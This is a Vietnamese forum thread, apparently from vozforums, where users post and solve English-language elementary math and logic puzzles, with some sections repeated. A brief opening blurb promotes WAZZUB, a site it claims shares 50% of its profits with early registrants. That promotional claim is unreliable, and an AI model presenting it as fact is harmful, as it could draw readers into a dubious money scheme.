WAZZUB LÀ GÌ?
WAZZUB là mạng xã hội. Cơ chế hoạt động giống như Google và Facebook. Với hàng tỉ lượt truy cập mỗi ngày và tạo ra doanh thu hàng tỉ doollar thông qua các lượt truy cập cũng như quảng cáo.... Tuy nhiên, Khác với Google và Facebook, nó chia sẽ 50% lợi nhuận (share profit) cho những người đăng ký trước ngày 9/4/2012.
WAZZUB - Sao ko thử ?
Hại não với toán tiểu học nào :-ss [p3]
80. [ ??? ]
79. [ ??? ]
Solomon went to the shopping centre to buy supplies for his mathematics
project. He spent half of what he had plus R2 in the first shop, half of
what he then had left plus R1 in the second shop, half of what he then
had left plus R1 in the third shop and, in the fourth shop half of all he had
left. Three rand was left over. How much money did he start with?
(R = rand)
78. [ ??? ]
Agnes said “Billy always speaks the truth”.
Billy said “Agnes is lying”.
Charlotte said “Agnes and Billy are both lying”.
Who is speaking the truth?
77. [ ??? ]
76. [ done ]
A clock that rings the bell at the same times with the hours , times between 2 rings is 5s.
(ex: 3 o'clock the clock will ring 3 times , 0s - 5s - 10s).
How many seconds that u have to spend to know that is 10 o'clock?
Ans: 50s
(45s for 10 ring times, and 5s for listening whether or not have 11th-ring).
75. [ ??? ]
74. [ done ]
73. [ ??? ]
Suppose the three sides of a triangular field are all integers, and its area equals the perimeter (in numbers). What is the largest possible area of the fields?
72. [ ??? ]
The area of a rectangle is numerically equal to twice its perimeter and both the length and the breadth are positive integer. How many such rectangles are possible?
71. [ ??? ]
A train which left Johannesburg at time x:y (which means y minutes after x o’clock) reach Pretoria at time y:z on the same day, after travelling z hours and x minutes. (All the times are given on a 24 hour clock.) How many possible values of x are there?
70. [ done ]
ABCD is a rectangle. AB=2BC. The triangle ABE is equilateral. The point M is the mid point of the side BE. Find the angle CMB (in degrees).
69. [ ??? ]
A woman, her brother, her son, and her daughter are chess players (all relations by birth). The worst player’s twin (who is one of the four players) and the best player are of opposite sex. The worst player and the best player are the same age. Who is the worst player?
68. [ done ]
An object in the plane moves from one lattice point to another. At each step, the object may move one unit to the right, one unit to the left, one unit up, or one unit down. If the object starts at the origin and takes a ten-step path, how many different points could be the final points?
67. [ done ]
A two-digit number divided by a two-digit number is equal to a one-digit number. The 5-digits used are 1,3,5,7,9 and each is used only once. Fill in the number in the answer column.
_ _ ÷ _ _ = _
66. [ done ]
Mr. Nichols takes his morning walk every day travelling at 4 mph. Each day he arrives at the high school at the same time as the school bus which travels the same route as he walks. One day Mr. Nichols was 45 minutes late and the school bus passed him 8 miles from the school. In how many minutes will the school bus arrive at the school?
65. [ done ]
We put 48 pebbles in 3 groups so that the first group has 11 pebbles, the second group has 14 pebbles, and the third group has 23 pebbles. In every step you may move so many pebbles from one group to another that the number of pebbles in the target group would double. Even out the number of pebbles in the groups in the least number of steps.
64. [ done ]
How many eggs are there in a basket if you would have 3 left over when taking them out of the basket in groups of 5, you would have 4 left over when taking them out in groups of 7, and you would have 5 left over when taking them out in groups of 9?
63. [ done ]
Let's write the numbers from 1 to 60 one after the other: N=123...5960. Delete 100 digits from this number so that you would get the highest possible number when you push the remaining digits close together. What is this number?
N có tổng cộng 9+(60-9)*2=111 chữ số, vậy sau khi xóa thì còn 11 chữ số
để cho N lớn nhất có thể thì các chữ số ở những hàng đầu tiên (tính từ trái sang) phải lớn nhất có thể
chữ số hàng cao nhất: xóa 8 số đầu tiên của N, giữ lại số 9. Xóa 8 chữ số
chữ số hàng cao thứ hai: xóa các số từ 10->18 và chữ số 1 của số 19, giữ lại chữ số 9. Xóa 19 chữ số
chữ số hàng cao thứ ba: xóa các số từ 20->28 và chữ số 2 của số 29, giữ lại chữ số 9. Xóa 19 chữ số
chữ số hàng cao thứ tư: xóa các số từ 30->38 và chữ số 3 của số 39, giữ lại chữ số 9. Xóa 19 chữ số
chữ số hàng cao thứ năm: xóa các số từ 40->48 và chữ số 4 của số 49, giữ lại chữ số 9. Xóa 19 chữ số
đến đây ta có số 999995051525354555657585960 và còn: 100-19x4-8=16 chữ số nữa cần xóa
nếu ta tiếp tục xóa theo cách như đã làm với các hàng trước, thì sẽ được chữ số hàng cao thứ 6 là 5, như vậy ta phải tìm cách xóa sao cho ở hàng này là chữ số >=5, đó là số 7. Xóa từ 50->56 và chữ số 5 của 57, như vậy đã xóa thêm 15 chữ số. Số còn lại:
999997585960
xóa chữ số 5 đằng sau số 7 ta được số lớn nhất có thể là:
99999785960
59. [ done ]
http://vozforums.com/attachment.php?...1&d=1330317661
58. [ done ]
Alex had three boxes of marbles. In the first box, 30% of the marbles were blue. There were twice as many marbles in the second box as in the first box, and 25% were blue in the second box. There were twice as many marbles in the third box as in the second box, and 20% were blue in the third box. Alex lost the third box. What percentage of his blue marbles did he lose?
Hint:
30% A
25% B
20% C
C = 2B = 4A
(20C) / [ 30A + 25B + 20C ]
Ans: 50%
57. [ done ]
25% of the people who like chocolate like hot pepper.
90% of the people who like hot pepper like chocolate.
Everyone likes one or the other or both.
What fraction of the people like both ?
Express your answer as a common fraction.
Cách khác:
56. [ done ]
A 50x13 rectangle is divided into 1x1 squares by lines parallel to the sides of the rectangle. A diagonal of the rectangle is drawn. How many of the 1x1 square does the diagonal pass through?
ƯCLN(50,13)=1, như vậy ngoài 2 đầu mút, thì đường chéo không đi qua bất kỳ một đầu mút của hình vuông nhỏ nào.
Nhận xét rằng để đi từ 1 đỉnh đến đỉnh kia thì đường chéo phải cắt 49 đường kẻ ngang và 12 đường kẻ dọc, và mỗi lần cắt thì nó lại chuyển sang 1 hình vuông nhỏ mới.
vậy đường chéo đã chuyển 49+12=61 lần, tức đã đi qua 61 hình vuông nhỏ mới, chưa kể hình vuông nhỏ mà chứa đỉnh xuất phát. vậy đường chéo này cắt tổng cộng 62 hình vuông.
//willrock: mình bổ sung thêm cái công thức số ô cắt = dài + rộng - ucln(dài, rộng)
55. [ done ]
A carton of apple juice costs 30 cents. A carton of mango juice costs 50 cents. Alicia bought some cartons of apple juice and some cartons of mango juice, and spent $17.30. Let V be the maximum number of cartons that she could buy and Y be the minimum number of cartons that she could buy. Find: V – Y = ???
gọi số hộp nước táo là a và nước xoài là b thì: 30a+50b=1730
<->3a+5b=173
để ý rằng với mỗi $1.5 thì có thể hoặc mua 5 nước táo, hoặc 3 nước xoài
như vậy (a+b) lớn nhất khi số nước xoài mua ít nhất có thể, và (a+b) nhỏ nhất khi số nước táo mua ít nhất có thể
173 chia 3 dư 2->5b chia 3 dư 2->b chia 3 dư 1->b nhỏ nhất bằng 1 và a=56, Vậy V=57
173 chia 5 dư 3->3a chia 5 dư 3->a chia 5 dư 1->a nhỏ nhất bằng 1 và b=34,
Vậy Y=35
->V-Y=22
54. [ done ]
A farmer has ten baskets of eggs containing 12, 13, 14, 16, 18, 19, 22, 24, 29 and
34 eggs respectively. Some baskets have chicken eggs while other baskets have
duck eggs. He sells one basket and found that the number of remaining
chicken eggs is three times the number of the remaining duck eggs. How many
eggs were in the basket he sold?
tổng số trứng = 201, chia 4 dư 1
số trứng sau khi bán 1 giỏ hiển nhiên là số chia hết cho 4
vậy giỏ đã bán chứa một số trứng chia 4 dư 1, đó chỉ có thể là giỏ 13 hoặc 29
thử lại:
- bán giỏ 13: số trứng còn lại=188, số trứng vịt còn lại=47, như vậy có thể các giỏ 18 và 29 chứa trứng vịt, còn lại chứa trứng gà
- bán giỏ 29: số trứng còn lại=172, số trứng vịt còn lại=43, như vậy có thể các giỏ 12,13,18 chứa trứng vịt, còn lại chứa trứng gà
53. [ done ]
We can express 2009 as the sum of four different numbers each of which consists
of at least two digits and all the digits are identical, 2009=1111+777+88+33.
What is the minimum number of addends needed to express 9002 in the same
manner?
đầu tiên xác định các số A,B,C sao cho:9002=A.1111+B.111+C.11 với A<=8, B và C<=45
9002=(101A+C).11+B.111 chia 11 dư 4
111 chia 11 dư 1 -> B chia 11 dư 4
B<=45 vậy B chỉ có thể nhận các giá trị 4,15,26,37
B=4->A lớn nhất bằng 7 và C nhỏ nhất bằng 71, loại
B=15->A lớn nhất bằng 6 và C nhỏ nhất bằng 61, loại
B=26->A lớn nhất bằng 5 và C nhỏ nhất bằng 51, loại
B=37->A lớn nhất bằng 4 và C lớn nhất bằng 41
37 viết được thành tổng của 8 số: 37=1+2+3+4+5+6+7+9
41 viết được thành tổng của 8 số: 41=1+2+3+5+6+7+8+9
vậy có 1 cách duy nhất viết 9002 thành tổng của 17 số hạng thỏa mãn đề bài:
9002=4444+999+777+666+555+444+333+222+111+99+88+77+66+55+33+22+11
52. [ done ]
Ace, Bea and Cec are each given a positive integer. They do not know the
numbers given to the others, but are told that the sum of the three numbers is 15.
Ace announces that he can deduce that the other two have different numbers,
while Bea independently announces that she can deduce that no two of the three
numbers are the same. Hearing both announcement, Cec announces that he
knows all three numbers. What are they?
A nói B và C nhận được 2 số khác nhau->A nhận được 1 số chẵn
B nói cả 3 nhận được số khác nhau -> B nhận được 1 số chẵn lớn hơn hoặc bằng 8
như vậy C nhận được một số lẻ nhỏ hơn hoặc bằng 5.
nếu C nhận được 3 hoặc 1, C sẽ không dám kết luận A và B nhận được những số nào.
vậy C nhận được số 5, suy ra B nhận số 8 và A nhận số 2.
51. [ done ]
A drawer contains 10 red socks and 10 blue socks. What is the smallest number of socks you must remove before you are assured of getting a matching pair?
Đáp án ra là 3 thôi =))
Tội cho các bác suy nghĩ phức tạp hóa bài toán...
READMORE
79. [ ??? ]
Solomon went to the shopping centre to buy supplies for his mathematics
project. He spent half of what he had plus R2 in the first shop, half of
what he then had left plus R1 in the second shop, half of what he then
had left plus R1 in the third shop and, in the fourth shop half of all he had
left. Three rand was left over. How much money did he start with?
(R = rand)
78. [ ??? ]
Agnes said “Billy always speaks the truth”.
Billy said “Agnes is lying”.
Charlotte said “Agnes and Billy are both lying”.
Who is speaking the truth?
77. [ ??? ]
Quote:
| Originally Posted by Wichita12  which number is below 2013 ? |
A clock that rings the bell at the same times with the hours , times between 2 rings is 5s.
(ex: 3 o'clock the clock will ring 3 times , 0s - 5s - 10s).
How many seconds that u have to spend to know that is 10 o'clock?
Ans: 50s
(45s for 10 ring times, and 5s for listening whether or not have 11th-ring).
75. [ ??? ]
Quote:
 |
Quote:
 |
Suppose the three sides of a triangular field are all integers, and its area equals the perimeter (in numbers). What is the largest possible area of the fields?
72. [ ??? ]
The area of a rectangle is numerically equal to twice its perimeter and both the length and the breadth are positive integer. How many such rectangles are possible?
71. [ ??? ]
A train which left Johannesburg at time x:y (which means y minutes after x o’clock) reach Pretoria at time y:z on the same day, after travelling z hours and x minutes. (All the times are given on a 24 hour clock.) How many possible values of x are there?
70. [ done ]
ABCD is a rectangle. AB=2BC. The triangle ABE is equilateral. The point M is the mid point of the side BE. Find the angle CMB (in degrees).
Quote:
| Originally Posted by shjnka bài 70 M là trung điểm BE => BM=ME=CB=1/2 AB => tam giácMBC cân tại B angle MBC = 90 - angle ABE = 90 -60 = 30 angle CMB = angle MCB = (180 - angle MBC)/2= 75 |
A woman, her brother, her son, and her daughter are chess players (all relations by birth). The worst player’s twin (who is one of the four players) and the best player are of opposite sex. The worst player and the best player are the same age. Who is the worst player?
68. [ done ]
An object in the plane moves from one lattice point to another. At each step, the object may move one unit to the right, one unit to the left, one unit up, or one unit down. If the object starts at the origin and takes a ten-step path, how many different points could be the final points?
Quote:
| Originally Posted by willrock9999 các điểm kết thúc chỉ có thể là những điểm có tọa độ (a,b) thỏa |a| + |b| <= 10, điều này cũng có nghĩa là các điểm kết thúc phải là 2.k bước theo dọc hoặc 2.k bước theo hàng ngang hoặc 1.k bước theo đường xéo (45*). Lý giải theo cái sơ đồ của bác thì từ 10 ta cách vô 2 ô, rồi cách vô 2 ô típ theo,... là 10, 8, 6,... cứ thế đến ô bắt đầu (ô bắt đầu cũng có thể là ô kết thúc). Còn hàng 9 cũng thế, cách vô lần lượt 2 ô, ta có 9, 7, 5,... tương tự cho các hàng còn lại. Quĩ tích cuối cùng ta đc một cái lưới hình vuông có 11 đường dọc ở các cạnh. Đáp án sẽ là 11x11 = 121 điểm  |
A two-digit number divided by a two-digit number is equal to a one-digit number. The 5-digits used are 1,3,5,7,9 and each is used only once. Fill in the number in the answer column.
_ _ ÷ _ _ = _
Quote:
| giả sử phép toán là ab : cd = e hiển nhiên là b,d,e không thể bằng 5 nếu không một trong hai số còn lại phải bằng 5 hoặc 0 c không thể bằng 5 vì nếu thế thì ab>100 vậy a=5, do cd>10 nên e chỉ có thể nhận giá trị < 5 (e=1 hoặc 3) hiển nhiên e khác 1 nên e=3 như vậy có 5b : cd = 3 59 : 3 < 20, do đó cd < 20 nên c=1 5b chia hết cho 3 nên (5+b) chia hết cho 3, suy ra b=7 còn lại d=9 |
Mr. Nichols takes his morning walk every day travelling at 4 mph. Each day he arrives at the high school at the same time as the school bus which travels the same route as he walks. One day Mr. Nichols was 45 minutes late and the school bus passed him 8 miles from the school. In how many minutes will the school bus arrive at the school?
Quote:
| Bình thường người đi bộ nếu không đi muộn 45p thì ở thời điểm bus ở cách trường 8 dặm , người đó sẽ ở cách trường 8 - 4*45/60 = 5 dặm => người và bus đến cùng thời điểm => trong cùng thời gian, người phải đi hết 5 dặm còn lại và bus phải đi hết 8 dặm còn lại => hết 5/4 = 1.25h đáp án: 75 phút. |
We put 48 pebbles in 3 groups so that the first group has 11 pebbles, the second group has 14 pebbles, and the third group has 23 pebbles. In every step you may move so many pebbles from one group to another that the number of pebbles in the target group would double. Even out the number of pebbles in the groups in the least number of steps.
Quote:
| Originally Posted by sillylikeyou 65. 11 14 23 22 14 12 (1st) 8 28 12 (2nd) 16 20 12 (3rd) 16 8 24 (4th) 16 16 16 (5th) |
How many eggs are there in a basket if you would have 3 left over when taking them out of the basket in groups of 5, you would have 4 left over when taking them out in groups of 7, and you would have 5 left over when taking them out in groups of 9?
Quote:
| Originally Posted by graceoflives gọi số trứng là T theo đề bài thì T=5x+3=7y+4=9z+5 với x,y,z là các số tự nhiên -> 5x=7y+1=9z+2 (1) -> (7y+1) và (9z+2) đều chia hết cho 5 -> y và z chia 5 dư 2. đặt y=5b+2, z=5c+2 (b,c là số tự nhiên) thay vào (1) ta có x=7b+3=9c+4 -> 7b=9c+1 -> (9c+1) chia hết cho 7 -> c chia 7 dư 3 đặt c=7k+3 (k là số tự nhiên) thay ngược lại từ dưới lên được số trứng T=158+315k (k tự nhiên) |
Let's write the numbers from 1 to 60 one after the other: N=123...5960. Delete 100 digits from this number so that you would get the highest possible number when you push the remaining digits close together. What is this number?
N có tổng cộng 9+(60-9)*2=111 chữ số, vậy sau khi xóa thì còn 11 chữ số
để cho N lớn nhất có thể thì các chữ số ở những hàng đầu tiên (tính từ trái sang) phải lớn nhất có thể
chữ số hàng cao nhất: xóa 8 số đầu tiên của N, giữ lại số 9. Xóa 8 chữ số
chữ số hàng cao thứ hai: xóa các số từ 10->18 và chữ số 1 của số 19, giữ lại chữ số 9. Xóa 19 chữ số
chữ số hàng cao thứ ba: xóa các số từ 20->28 và chữ số 2 của số 29, giữ lại chữ số 9. Xóa 19 chữ số
chữ số hàng cao thứ tư: xóa các số từ 30->38 và chữ số 3 của số 39, giữ lại chữ số 9. Xóa 19 chữ số
chữ số hàng cao thứ năm: xóa các số từ 40->48 và chữ số 4 của số 49, giữ lại chữ số 9. Xóa 19 chữ số
đến đây ta có số 999995051525354555657585960 và còn: 100-19x4-8=16 chữ số nữa cần xóa
nếu ta tiếp tục xóa theo cách như đã làm với các hàng trước, thì sẽ được chữ số hàng cao thứ 6 là 5, như vậy ta phải tìm cách xóa sao cho ở hàng này là chữ số >=5, đó là số 7. Xóa từ 50->56 và chữ số 5 của 57, như vậy đã xóa thêm 15 chữ số. Số còn lại:
999997585960
xóa chữ số 5 đằng sau số 7 ta được số lớn nhất có thể là:
99999785960
Quote:
| Originally Posted by willrock9999 62. [ done ]  A can only be 5 or 0 (as 5E ends with digit A). A can not be 0. If A= 5 then E={1,3,5,7,9} * E=1 >> 4D=5 (no D satisfied) >> E could not be 1 * E=3 >> 5*3=15, A=5, 4D+1 =5 >> 4D=4 >> D ={1,6} - If D=1 >> 4D+1=5, 3C=5 >> C=5=A >> D could not be 1 - If D=6 >> 4D+1=25, A=5, 3C+2=5 >> 3C=3 >>C=1 2B =5 (no B satisfied) >> D could not be 6 >> E could not be 3 * E=5 >>5E =25, A=5, 4D+2=5>> no D satisfied >> E could not be 5 * E=7 >> 5E=35, A=5, 4D+3=5>>4D=2 >> D ={3,8} - If D=3, 3*4+3=15, A=5, 3C+1=5 >>3C=4 >>C=8 3*8+1=25, 2B+2=5 >> No B satisfied >> D could not be 3 - If D=8, 8*4 +3 = 35, 3C+3=5>> 3C=2 >> C =4 3*4+3=15, 2B+1=5 >> 2B=4 >> B=2 >> One solution is A=5, B=2, C=4, D=8, E=7 * If E=9 >> 9*5=45, 4D+4=5 >>4D=1 (no D satisfied) 61. [ done ]  Tổng là 4321 nên A là 3 hoặc 4. Loai 4 vì tổng lớn hơn 4321. =>A=3 =>B+A=11 hoặc B+A=12(ko thể là 13 vì tổng hàng chục sẽ lớn hơn 13 nhớ 1 sang hàng trăm) + Nếu B+A=12 thì B=9 và tổng hàng chục phải nhỏ hơn 20 => tổng hàng chục là 12 => C=0 và tổng hàng đơn vị phải <10 loại + Nếu B+A=11 thì B=8 và tổng hàng chục là 22 =>D+C+B+A=21(vì tổng có hàng đơn vị là 1 và B=8 A=3 nên tổng 4 số chắc chắn nhỏ hơn 31) =>C+B+A+2=22=>C=9=>D=1 =>ABCD là 3891 Reply With Quote 60. [ done ]  If we drive on the right hand side of the street and the picture is what we can see from our current position, it must be that we are running towards the right side of the picture and the bus is heading towards the left since we cannot see its door ... |
59. [ done ]
http://vozforums.com/attachment.php?...1&d=1330317661
58. [ done ]
Alex had three boxes of marbles. In the first box, 30% of the marbles were blue. There were twice as many marbles in the second box as in the first box, and 25% were blue in the second box. There were twice as many marbles in the third box as in the second box, and 20% were blue in the third box. Alex lost the third box. What percentage of his blue marbles did he lose?
Hint:
30% A
25% B
20% C
C = 2B = 4A
(20C) / [ 30A + 25B + 20C ]
Ans: 50%
57. [ done ]
25% of the people who like chocolate like hot pepper.
90% of the people who like hot pepper like chocolate.
Everyone likes one or the other or both.
What fraction of the people like both ?
Express your answer as a common fraction.
Quote:
| Mình thì giải theo cách này Let x be the number of people like both. Then: The number of people like chocolate is C = (100/25)x The number of people like pepper is P = (100/90)x The fraction of the people like both: x / [ C + P - x] = 9/37 |
Quote:
| Gọi x là số người thích cả hai 25% số người thích socola thích cả ớt-> số người chỉ thích socola=3x 90% số người thích ớt thích cả socola-> số người chỉ thích ớt=1/0.9-1=x/9 vậy tỉ lệ người thích cả hai trong số người đó là:x*100%/(x+3x+x/9)=24,32% 9/37 ^^! |
A 50x13 rectangle is divided into 1x1 squares by lines parallel to the sides of the rectangle. A diagonal of the rectangle is drawn. How many of the 1x1 square does the diagonal pass through?
ƯCLN(50,13)=1, như vậy ngoài 2 đầu mút, thì đường chéo không đi qua bất kỳ một đầu mút của hình vuông nhỏ nào.
Nhận xét rằng để đi từ 1 đỉnh đến đỉnh kia thì đường chéo phải cắt 49 đường kẻ ngang và 12 đường kẻ dọc, và mỗi lần cắt thì nó lại chuyển sang 1 hình vuông nhỏ mới.
vậy đường chéo đã chuyển 49+12=61 lần, tức đã đi qua 61 hình vuông nhỏ mới, chưa kể hình vuông nhỏ mà chứa đỉnh xuất phát. vậy đường chéo này cắt tổng cộng 62 hình vuông.
//willrock: mình bổ sung thêm cái công thức số ô cắt = dài + rộng - ucln(dài, rộng)
55. [ done ]
A carton of apple juice costs 30 cents. A carton of mango juice costs 50 cents. Alicia bought some cartons of apple juice and some cartons of mango juice, and spent $17.30. Let V be the maximum number of cartons that she could buy and Y be the minimum number of cartons that she could buy. Find: V – Y = ???
gọi số hộp nước táo là a và nước xoài là b thì: 30a+50b=1730
<->3a+5b=173
để ý rằng với mỗi $1.5 thì có thể hoặc mua 5 nước táo, hoặc 3 nước xoài
như vậy (a+b) lớn nhất khi số nước xoài mua ít nhất có thể, và (a+b) nhỏ nhất khi số nước táo mua ít nhất có thể
173 chia 3 dư 2->5b chia 3 dư 2->b chia 3 dư 1->b nhỏ nhất bằng 1 và a=56, Vậy V=57
173 chia 5 dư 3->3a chia 5 dư 3->a chia 5 dư 1->a nhỏ nhất bằng 1 và b=34,
Vậy Y=35
->V-Y=22
54. [ done ]
A farmer has ten baskets of eggs containing 12, 13, 14, 16, 18, 19, 22, 24, 29 and
34 eggs respectively. Some baskets have chicken eggs while other baskets have
duck eggs. He sells one basket and found that the number of remaining
chicken eggs is three times the number of the remaining duck eggs. How many
eggs were in the basket he sold?
tổng số trứng = 201, chia 4 dư 1
số trứng sau khi bán 1 giỏ hiển nhiên là số chia hết cho 4
vậy giỏ đã bán chứa một số trứng chia 4 dư 1, đó chỉ có thể là giỏ 13 hoặc 29
thử lại:
- bán giỏ 13: số trứng còn lại=188, số trứng vịt còn lại=47, như vậy có thể các giỏ 18 và 29 chứa trứng vịt, còn lại chứa trứng gà
- bán giỏ 29: số trứng còn lại=172, số trứng vịt còn lại=43, như vậy có thể các giỏ 12,13,18 chứa trứng vịt, còn lại chứa trứng gà
53. [ done ]
We can express 2009 as the sum of four different numbers each of which consists
of at least two digits and all the digits are identical, 2009=1111+777+88+33.
What is the minimum number of addends needed to express 9002 in the same
manner?
đầu tiên xác định các số A,B,C sao cho:9002=A.1111+B.111+C.11 với A<=8, B và C<=45
9002=(101A+C).11+B.111 chia 11 dư 4
111 chia 11 dư 1 -> B chia 11 dư 4
B<=45 vậy B chỉ có thể nhận các giá trị 4,15,26,37
B=4->A lớn nhất bằng 7 và C nhỏ nhất bằng 71, loại
B=15->A lớn nhất bằng 6 và C nhỏ nhất bằng 61, loại
B=26->A lớn nhất bằng 5 và C nhỏ nhất bằng 51, loại
B=37->A lớn nhất bằng 4 và C lớn nhất bằng 41
37 viết được thành tổng của 8 số: 37=1+2+3+4+5+6+7+9
41 viết được thành tổng của 8 số: 41=1+2+3+5+6+7+8+9
vậy có 1 cách duy nhất viết 9002 thành tổng của 17 số hạng thỏa mãn đề bài:
9002=4444+999+777+666+555+444+333+222+111+99+88+77+66+55+33+22+11
52. [ done ]
Ace, Bea and Cec are each given a positive integer. They do not know the
numbers given to the others, but are told that the sum of the three numbers is 15.
Ace announces that he can deduce that the other two have different numbers,
while Bea independently announces that she can deduce that no two of the three
numbers are the same. Hearing both announcement, Cec announces that he
knows all three numbers. What are they?
A nói B và C nhận được 2 số khác nhau->A nhận được 1 số chẵn
B nói cả 3 nhận được số khác nhau -> B nhận được 1 số chẵn lớn hơn hoặc bằng 8
như vậy C nhận được một số lẻ nhỏ hơn hoặc bằng 5.
nếu C nhận được 3 hoặc 1, C sẽ không dám kết luận A và B nhận được những số nào.
vậy C nhận được số 5, suy ra B nhận số 8 và A nhận số 2.
51. [ done ]
A drawer contains 10 red socks and 10 blue socks. What is the smallest number of socks you must remove before you are assured of getting a matching pair?
Đáp án ra là 3 thôi =))
Tội cho các bác suy nghĩ phức tạp hóa bài toán...
Hại não với toán tiểu học nào :-ss [p2]
50. [ done ]
A ball was dropped from a height of 270 m. On each rebound, it rose to 10% of the previous height. Find the total vertical distance travelled by the ball before coming to rest.
Ans: 330m
49. [ done ]
48. [ done ]
Thêm 1 câu hại não nữa nhé >"<
Đáp án khác nà (_.__")
cái này là đố logic, ko phải đố điêu bác ơi
//cơ mà dù sao đó cũng là câu trả lời chính xác =))
47. [ done ]
A family consists of 1 grandfather, 2 fathers, 1 father-in-law , 1 brother, 2 sons, 1 grandmother, 2 mothers, 1 mother-in-law, 1 daughter-in-law, 2 sisters, 2 daughters, 4 children and 3 grandchildren. What is the smallest possible number of persons in this family?
//cái này đỡ hơn cái kịch hài "Vì sao tôi điên" nhiều =)), ai chưa biết hài đó, search youtube coi trước đi >"<
46. [ done ]
//Đùng gòi đó, cái điêu của bài toán là vuông góc nhưng nó ko nói, chỉ thể hiện trên hình vẽ, cơ mà cái hình nó cũng điêu, k thèm đánh dấu vuông lun =))
Do là tiểu học nên chấp nhận kỹ xảo này, nếu trình độ cao hơn, giải bài toán chèn Sin góc ADC vô (lượng giác ấy) thì lý luận tương tự cũng ra.
45. [ done ]
Three clocks, with their hour hands missing, have minute hands which run faster than normal. Clocks A, B and C each gains 2, 6 and 15 minutes per hour respectively. They start at noon with all three minute hands pointing to 12. How many hours have passed before all three minute hands next point at the same time?
44. [ done ]
Given that a, b and c are different whole numbers from 1 to 9, find the largest possible value of (a+b+c) / (abc).
//Câu này ai nhìn vô cũng biết đáp số liền đc à, giải thích mới khó nhé, đề nghị đưa ra giải thích thuyết phục (_.__")
43. [ done ]
42. [ done ]
41. [ done ]
40. [ done ]
39. [ done ]
Câu này hay nà ^^!
There are buses travelling to and fro between Station A and Station B. The buses leave the stations at regular interval and a bus will meet another bus coming in the opposite direction every 6 minutes.
Peter starts cycling from A towards B at the same time Jane starts cycling from B towards A.
Peter and Jane will meet a bus coming in the opposite direction every 7 and 8 minutes respectively.
After 56 minutes of cycling on the road, they meet each other.
Find the time taken by a bus to travel from A to B.
38. [ done ]
Câu này giải sao trời @@
37. [ done ]
Three straight lines can form a maximum of one triangle.
Four straight lines can form a maximum of two non-overlapping triangles as shown below.
Five straight lines can form a maximum of five non-overlapping triangles.
Six straight lines can form a maximum of x non-overlapping triangles.
Find the value of x.
36. [ done ]
Find the missing number x in the following number sequence.
2, 9, -18, -11, x , 29, -58, -51,…
35. [ done ]
Given that the value of the sum 1/a + 1/b + 1/c lies between 28/29 and 1. Find the smallest possible value of a + b + c where a,b,c are whole numbers.
34. [ done ]
A language school has 100 pupils in which 69% of the pupils study French, 79% study German, 89% study Japanese and 99% study English. Given that at least x % of the students study all four languages, find the value of x.
33. [ done ]
At a town gathering, the people gathered are given a number card from 1 onwards according to their arrival. The last digit of the last person’s card number who arrived will determine the winning number and prizes will be given. As the last digit of the last person’s card number was 7, all who had card with 7 as their last digit received prize of $500 each. However, it was discovered that one card was not distributed. The last digit of the card which was not given was 2. Then with a bigger number than the one not distributed, $300 each were given out to all with 8 as the last digit on their cards as additional prizes. As a result, 33 people received prizes and total amount of prizes was $14,100.
What was the card number of the last person who arrived?
What was the number of the card which was not given out?
32. [ ??? ]
(1,1,9) is a triple of natural numbers whose sum is 11. We consider (1,1,9), (1,9,1) and (9,1,1) to be the same triple because each triple has the same three numbers. How many other triples of natural numbers have a sum of 11?
31. [ ??? ]
TV nhé ^^!
30. [ ??? ]
Câu này hơi điêu... =.=
24. [ ??? ]
26. [ ??? ]
Given that the product of four difference whole numbers is 10,000. Find the greatest possible value of the sum of the four numbers???
27. [ ??? ]
Don't use calculator, compare:
3^40
5^30
7^20
28. [ ??? ]
29. [ ??? ]
Given that 5 by 5 grid consists of 25 unit squares. Find the largest number of unit squares to be shaded so that each row, each column and each of the two main diagonal lines has at most 2 unit squares that are shaded???
READMORE
A ball was dropped from a height of 270 m. On each rebound, it rose to 10% of the previous height. Find the total vertical distance travelled by the ball before coming to rest.
Ans: 330m
49. [ done ]
Quote:
| Originally Posted by sunary Câu 49: n1=1 n2=3 n3=5 ... n100 = 2*100 -1 =>n1+n2+...+n100 = n100^2 = 10000 // 1 + 3 +5 +... +(2*n-1) = n*n |
Thêm 1 câu hại não nữa nhé >"<
Quote:
| Originally Posted by lightknight1904 A là BLUE , nếu nhìn kĩ sẽ thấy mỗi "màu" thì hình tròn sẽ tiếp xúc với số vòng tròn tương ứng , ở đây A tiếp xúc với 3 vòng |
Quote:
| Originally Posted by sadprince1tical câu 48 : trắng. 30 charrrrrr |
//cơ mà dù sao đó cũng là câu trả lời chính xác =))
47. [ done ]
A family consists of 1 grandfather, 2 fathers, 1 father-in-law , 1 brother, 2 sons, 1 grandmother, 2 mothers, 1 mother-in-law, 1 daughter-in-law, 2 sisters, 2 daughters, 4 children and 3 grandchildren. What is the smallest possible number of persons in this family?
//cái này đỡ hơn cái kịch hài "Vì sao tôi điên" nhiều =)), ai chưa biết hài đó, search youtube coi trước đi >"<
Quote:
| Originally Posted by Wichita12 ông - bà ( là cha- mẹ của người cha) cha - mẹ ( mẹ sẽ gọi ông bà là in-law) 1 ng` con trai 2 ng` con gái - ng` con trai gọi 2 ng` kia là Sister - 2 fathers là 1 cha với 1 ông nội - 2 monters tương tự - mẹ gọi ông bà là in-law là ngược lại - 2 sons là bố và đứa con - 2 sisters thực ra tính là mẹ với ng` con gái nhưng vậy thì thiếu 1 nên em cho gia đình có 2 đưa con gái đề đứa con trai gọi là sister - 4 children là cha (con của ông bà) và 3 đứa con (mẹ là in-law không tính) - 3 grandchild biết rồi => 7 người  |
Quote:
| Originally Posted by graceoflives 46. ta thấy từ hình vẽ, góc D vuông, như vậy góc B cũng vuông và theo đó, S(ABCD)=a.b=385 385=5x7x11. như vậy theo đề bài, b chỉ có thể bằng 1,5,7 hoặc 11.dễ thấy khi b=11 và do đó a=35, thì (a+b) đạt giá trị nhỏ nhất =46 vậy chu vi bé nhất của ABCD là 2(a+b)=2.46=92 |
Do là tiểu học nên chấp nhận kỹ xảo này, nếu trình độ cao hơn, giải bài toán chèn Sin góc ADC vô (lượng giác ấy) thì lý luận tương tự cũng ra.
45. [ done ]
Three clocks, with their hour hands missing, have minute hands which run faster than normal. Clocks A, B and C each gains 2, 6 and 15 minutes per hour respectively. They start at noon with all three minute hands pointing to 12. How many hours have passed before all three minute hands next point at the same time?
Quote:
